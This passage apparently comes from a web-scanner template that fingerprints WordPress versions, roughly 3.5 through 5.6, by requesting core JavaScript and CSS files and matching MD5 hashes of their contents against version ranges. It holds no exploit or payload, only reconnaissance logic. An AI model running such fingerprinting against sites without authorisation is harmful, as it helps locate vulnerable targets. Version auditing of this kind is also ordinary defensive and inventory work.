dsl: - - "(\"16a54defdaf982da0cabd83ec44e236e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-emoji.js" - matchers: - - type: dsl - name: 4.6 - 5.0.11 - dsl: - - "(\"ddc49ad0e4b146cc8ff73d976f1298bb\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"ef12ac13dfb8607a2d05135f00ceac5a\" == md5(body))" - - type: dsl - name: 4.4.3 - 4.4.24 - dsl: - - "(\"90dd09a79d1265f3d0601ffe37c97a01\" == md5(body))" - - type: dsl - name: 4.4.1 - 4.4.2 - dsl: - - "(\"ee346cf79cc3fc6f9757e3e8e716b5f3\" == md5(body))" - - type: dsl - name: 4.4 - dsl: - - "(\"a57538e3c37236da55c1f1da474e015e\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"504d2cee82879a8d64df784d9f2e9928\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"ad4b907b479f8a0742a4ca9af3b90857\" == md5(body))" - - type: dsl - name: 4.2.2 - dsl: - - "(\"a1ee27ad90d9bd862c162080115b1890\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.1 - dsl: - - "(\"974abbb6edce586b8aabe3731d19ef71\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"5a881bd372a52591d5972df05e9fab63\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"bd3c01dbc3b971ea143a6a4628400dba\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"2aae979a0e8bced7b6483b8671072ebd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/customize-preview.min.js" - matchers: - - type: dsl - name: 4.7.4 - 4.8.15 - dsl: - - "(\"71f5d65a2add0646814684e11b1a3af9\" == md5(body))" - - type: dsl - name: 4.7.3 - dsl: - - "(\"c2f8e7dbb3732123437acde95db6cfb8\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.2 - dsl: - - "(\"b9f62643c2bd209ffd28c665d16c7d3f\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"8eb16dc701cf206c22ab40082d814cb5\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"f7b940cf84777e434b486f6837657263\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"a05e8cd6f93d192e1c7232acf2544d86\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"2f60c6d976a975a85fd005c7759e7cbf\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"b8e325486884be9894b081ebac0d54ad\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"6978871856b8ff6629abcca584235417\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"ca3d5ac7ffbf318c461a06c42362e671\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"b06bc1c2d6c000215e645286a01295f3\" == md5(body))" - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"37964f44f324f359533e4ce7693e0636\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"6e3f2d3422ec9af1707e3b2d3dee2406\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"f4d0c657b387dd0a32fa0f98d7cf5b04\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"1ad333686be390fb54544cb0c3214c1d\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"7a6543b3b6d26ec558fac675836a565b\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"ed42144eb1409979845f15c50b90f0f0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/editor-expand.min.js" - matchers: - - type: dsl - name: 4.6.1 - 5.1.8 - dsl: - - "(\"4500034a26d73b737f761adcc7ef5c79\" == md5(body))" - - type: dsl - name: 4.6 - dsl: - - "(\"2003869bb96b00cd78b008bd667dd57d\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"eb145a2ecb2bb7e11fb759364301c88b\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"0deb56202e03c193c2584eba6874be49\" == md5(body))" - - type: dsl - name: 4.2.2 - 4.2.29 - dsl: - - "(\"78a1af5d700f31280bfc20621bce8e50\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.1 - dsl: - - "(\"09470901ca55f639595600af00a70d0c\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"89eab3c62d8a7e8d143ed648c593d3fd\" == md5(body))" - - type: dsl - name: 4.0.1 - 4.0.32 - dsl: - - "(\"4e78a0327caee92c94c119cbcdcdacf0\" == md5(body))" - - type: dsl - name: 4.0 - dsl: - - "(\"32c49e20a3451da0f1b76d1d218c684c\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"cec8ae46f57c71d64d459efcb897aac5\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"1ce055e767e96eeef80e5eb33bf2beb6\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"0d4ab764b7b09f2938b583fbd53fdce1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/plugin.js" - matchers: - - type: dsl - name: 4.8.1 - 4.8.15 - dsl: - - "(\"ef6e5669ee3af739f33eaf8c092edf87\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"049a123027cc7ed6f5cb6e567b631746\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"c3c8b527b2177fe3c1065d5812b86f48\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"db762695fd5a8d769b6a6002451db2bc\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"3956816511219402805b87ed3d6c1965\" == md5(body))" - - type: dsl - name: 4.5.3 - 4.5.23 - dsl: - - "(\"e2a1ffd8d68a5695a771d5c873539976\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.2 - dsl: - - "(\"1b1e5e7e85593bbba4e4f107b6371349\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"42f0fd8dc00634c3bd92d67f983167c6\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"e2622abed0990e5fa1c0a46ec9857c81\" == md5(body))" - - type: dsl - name: 4.2.2 - 4.2.29 - dsl: - - "(\"ed367f421e178c90f4c3bbd81479d79d\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.1 - dsl: - - "(\"ae6c8c67d69d6b4bfddbbe0383c5c141\" == md5(body))" - - type: dsl - name: 4.1.5 - 4.1.32 - dsl: - - "(\"65ba47e11a2641fd8126987586543f6c\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.4 - dsl: - - "(\"cccb0acc830cee3e5a2626dc44f6b2e3\" == md5(body))" - - type: dsl - name: 4.0.5 - 4.0.32 - dsl: - - "(\"f3aba863d0e75ae9baededd390b5c27a\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.4 - dsl: - - "(\"aaaa5adacaf254b8ed29827822052b96\" == md5(body))" - - type: dsl - name: 3.9.6 - 3.9.33 - dsl: - - "(\"e9a3b52c3321a947b3675e9452523bed\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.5 - dsl: - - "(\"fe275a56b9c9d2d4332f0df93a6d5260\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"4a542ce8fe045da7e3048411e421ba28\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.7 - dsl: - - "(\"1bbdc179b04731a40281f164ae2da2b0\" == md5(body))" - - type: dsl - name: 4.9.8 - 4.9.16 - dsl: - - "(\"49be97e35bba4ff1c426a6df80155e87\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"57aaf03ff9d4a85d6694c3c2d272195a\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"fb23e8dfbfb277faf246b3ae071de2c6\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"b8eab0015d30532664714ef9c9cc4801\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"abfe8ead341e68cfee6625b6d5627a0d\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"f8ed466f8435d6b8464eda4d3282e1ca\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/widgets/media-widgets.min.js" - matchers: - - type: dsl - name: 4.8.1 - 4.8.15 - dsl: - - "(\"92f604e25ad411a8ed016e06d21c44cc\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"030addbc8364e837fde9d573fa433329\" == md5(body))" - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"e8e8c2726be86a0e5959689f83e68b4a\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"28e1652d049ca7d1148616a9a65e4a84\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"df2e2d4114e8251bb20c7ab20d24cf37\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"1ced6b0ebd2b03929234bb3754dac0e9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/wp-content.css" - matchers: - - type: dsl - name: 4.8.1 - 4.8.15 - dsl: - - "(\"012706854c5bf037e8234aab32868fc8\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"dd1d6bb4548f4ee2ab740d8ba89b1b35\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"78532b5f1feda917ca31dc124122036a\" == md5(body))" - - type: dsl - name: 4.6.1 - 4.6.20 - dsl: - - "(\"8a9b561b793a96bad45a0b3034a260cf\" == md5(body))" - - type: dsl - name: 4.6 - dsl: - - "(\"07743f0d829a3e47573f7bdf68760ff9\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"16f8552760a0f3145c25184108b9a2f2\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"fa017da44bc83b2b437dbd75623012d7\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"f1aacaf6e127e33987f04a8304d4764d\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"1cd99e8652d4e846316f6af433bc58b6\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"f6c2d0436843a5aa1a7fb39eeb6561b1\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"1b587c086fe03c005a9f2f4fca8afecf\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"358d04384b5ffaf9f39f6055b5d274a8\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"3f256721ed5311483335c0067e619f54\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"78379f2a26af532dad0097d4521508e1\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.3.6 - dsl: - - "(\"8091ca12bafbea286c007455dd00ed62\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"81fc83c10f836091c606556e000d88b4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/widgets/text-widgets.js" - matchers: - - type: dsl - name: 4.8.2 - 4.8.15 - dsl: - - "(\"c1fd80a457b96b2fe7aecf56afe62fd3\" == md5(body))" - - type: dsl - name: 4.8.1 - dsl: - - "(\"2eda0fba7c33c68b92a25d71e49f24f7\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"bff1d54a16cd5b99c51bb68b6d9cde1b\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"62f4cd853c19bd9b7e2836395d2ffcf6\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"b767d49874c4dc6a0381b45973d41152\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"22a80b79f36eac9e6b9c1c60e217ac47\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/skin.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"b7da29baf0549e017bdeaa2d836db37b\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"27fe3311345b14cc022a9682a0e658da\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.3 - dsl: - - "(\"365dc556b970abfe2840e817186cdf42\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.5.23 - dsl: - - "(\"190bf976f841dfc921911f6aaf812b81\" == md5(body))" - - type: dsl - name: 4.5 - dsl: - - "(\"54ae8d249d7e018ff9f44e8de2ff7a73\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.4.24 - dsl: - - "(\"fa7377e0da20941e25af2944599e42db\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"14dc424b662c53b5f48fecdc03772c88\" == md5(body))" - - type: dsl - name: 4.1 - 4.2.29 - dsl: - - "(\"c12daa75772a539d80c0bfffae2db05d\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"3a92e071e9dcec15972d4952c9bbe996\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"ddef4827730dca9bd4f3a4d0deb11449\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"02160ddc16e5daa2ad1bf211dcc6914f\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"d46efe6ed170dbdd5b1b09ca55a35569\" == md5(body))" - - type: dsl - name: 4.9.8 - 4.9.16 - dsl: - - "(\"084491ba9b612bfaf8a5206e445e0845\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"55d1c98c7185470d72930e7690f9168c\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"535a474e0799c2da9168379230ea07fd\" == md5(body))" - - type: dsl - name: 5.2 - 5.6 - dsl: - - "(\"13fe85bf5c96a042969ca526e87077c7\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"dfedff5a5003bd85df8740d7589d17c4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/blue/colors.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"cb97bb7d8f7b5813d00c74f495df42e4\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"8b29881cd8a024af1c890f689893e50b\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"9338a0c97b787ee5a176b5cd7e830061\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"99211a5746557a4d67717867f9ae8c62\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"929931f07eb6f9063098fb589b618d52\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"3518d1b1e45e704aeecc47c0b5e5fae0\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"8d7de25287ecf81d4e0d04534fa900d0\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"11cc83c491b4dadcb47aa960562385fb\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"9603270ee78215cb5372db4ee9ff4d34\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"47ec7f3b440692e1d196533fac8e2ded\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"f91d3fa65fded514fdc32d5e48fa7eb9\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"2300f3cb6ec82e006d841f5b24a3374c\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"a9505503536e4d8709a8751e2a03bfab\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"2651332a375f96ccacd875fc87d9613e\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"972821b1f65532c5ee37170add513ed8\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"68051b391e123c7f627fb6532d169f1a\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"84449df9bef860843f536972b82c8742\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"f9672f0bd5557a33098c1be90036dd6f\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"129c377e3bec6b64007097e246a55b6e\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"55a0910147a43f0be506255b7232090f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/blue/colors-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"644b1f497f37168efa0876e9a41c3a35\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"d69489d26322d01d3b284a6b71a65f9a\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"80e102718830b90c49d2d0bb280629c2\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"4e5f19d15fc3adfb371fdf5e050c8b9d\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"eeccabc9952f2e1ba54a7b4abd49fafc\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"18340a88bc601743b7c70439cec488ed\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"633d5348edb8b8d16a1e5c73483fa94a\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"886bbb60c2a052bdce63ec9fb620718a\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"c016c36ec090f0aa83236b712e01dc5f\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"ddb7190d0c587934f493391b1edbccf4\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"1eabb79616c817d36c47003b9ac16aa0\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"096b4b8513175c73b8879474611d6a0d\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"ba77e07e130710f8d3c5125fac3ac14d\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"37af32fba1f76c7699f53034138a5853\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"10a5a7deb7dc77912ba0d9a24d3ce8e2\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"ddf1a9c32c6b7c8f2839c03446c60db1\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"8cc327c4f903ca467722dded1259e72f\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"e05488e16a8e2b95591cd65507afe911\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"ce122c37c5c54caea5e961c433149a71\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"8f053c22ff721fc2522e7479ca836404\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/sunrise/colors.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"4649feeb88af0d20436a518f89034c19\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"36da31029014d5cba2e1d6b2c3c94903\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"509e5f9805d5371f6afc4135fd361979\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"7dcd4b68ece82d3d9cc5be62d079244d\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"498b30f5cba3b1901b40567201b0700f\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"43709ad04cfe4981c074767db4cec654\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"e048709f08faeac3e1fdd8fb27869f0e\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"6dcfd9b5c29f86a7338bb35b5026fc0d\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"5a9869897cc9f0c7b41f4b03dbb86f58\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"44d81cafa065734abdb9239bc26e2c18\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"c3b594ce028a37cad08301b857e7dec7\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"1f288a158ad8d61c363da63dfba3ce88\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"ec86a046d8ac3cfec1b3f2511d713af4\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"b3e25847e2b09d594b37007464689fff\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"9bc1b13e10b32fd568b3d3fbd1503357\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"f25aff923e7408ae683fea1f1e4127a2\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"5f6c9a9233a9b01c16d32a00dd3301f4\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"01dc03bb80f16b38e95ac5a0ce98873e\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"0193d4dcc30f98ff251feedf560eb32d\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"aa7bd8d45c649f750fd00e59a4565c72\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/sunrise/colors-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"cbd6a9357f52f0a04bcd515642794f03\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"d1ee46c95c1fee5816652ee120a70f6b\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"32e6c9b314aa09741b00f3d25cbe93f8\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"e4274ca15d4a38aea20259bb83776ee5\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"f090d9aa28ba371afd6f6b0b4e1969f2\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"1579864ea35ebc26521222e136a961e7\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"0c5569b8a2822ed086e78645b0c9f1de\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"81182ae080141e8caa991886071853e0\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"dab7d054761842a41231761529e35c9d\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"b31e789f4c8dea9698cd4eb0c9d1f48d\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"64d732bae20f1bd9f1a39d28f479a35a\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"83667ac765db3b096efae880799fba9b\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"84292fd29fb971d80e6a76ba0b5252c6\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"bed194a77cb90e543b2ac3ea1c5e1c24\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"dc6ebc6bdf60e83bd93105a5f67b793d\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"f86f42cf3ea35d6a9c823366d3ca9b8a\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"15a1fe1b601c5da6101f06d6430671d0\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"3ee5bb2a6e6a2251b99f91d353b2d984\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"e0f9becb2dd284efbc3fcad8243ff792\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"0c90b3ca5dee78323591408173a74c0c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/sunrise/colors-rtl.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"c2718052027e9d64f65fdcc683368af7\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"bc5202c7967dc638e75867f7b8a8b32f\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"4bd6b6b92b306b97ba3de1c2421fc3e8\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"6a4efa94b2b654bef45f862cd92278ac\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"be0732f8240abe60df1783354817ade5\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"5889a9c995d14bafefe1e5c886333930\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"66666c9489057795c2fee523d4403546\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"c54630e1b0b4d089bbd6eef6bde0d456\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"0013fe5659a7e14442d3b2aa5af4a89d\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"e21cc147dadf70a8ec27483f9663a088\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"6c5a320447670be2deb734eddda4dda1\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"991698abb4180f23c4b7cba489523fe9\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"f5e26181e72a0e064669c5c1c7ee902e\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"d5f4c00a19c9ff0ad97c4ad53776af9e\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"c25f45bff5d0545cb0244345338939d7\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"b994fe4dc1ef5cd815f63ca00be88b2e\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"1dced46a49d62dd08e7f69e3f16d286b\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"7d9d2c7d00a0dd30b706387aff516ed9\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"39fbedd44ca7a270b0e7a5fab2e474b7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/sunrise/colors.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"e15962b9d758ca2c599163ff60c6d528\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"7c366a0f8539b65522d1f9b537a3dbfd\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"8c45e2cf777e40fe8b03318f0a193157\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"ca11cd01b2e32f152a3e8c6a74a85811\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"83453647da515355dc45a661ab42ea38\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"11c1107a87cc83ff1df4e588554e349a\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"8a605f4b01b48f4a6efa39949154c1a4\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"a7d3f86196983532af392984f57ba5f0\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"16115bd9c26d4331c193d20895a2f8ec\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"4b919105096d441f974a99dc6bc9e243\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"ce3859134e2fef6f56088bc505f46b48\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"1b5f74ec13f8502f5786b2aa39d7d901\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"b2876ba5e8d94b461debeaefbcbe58ed\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"95b305399ec12bf249cd6b2cc86326a1\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - 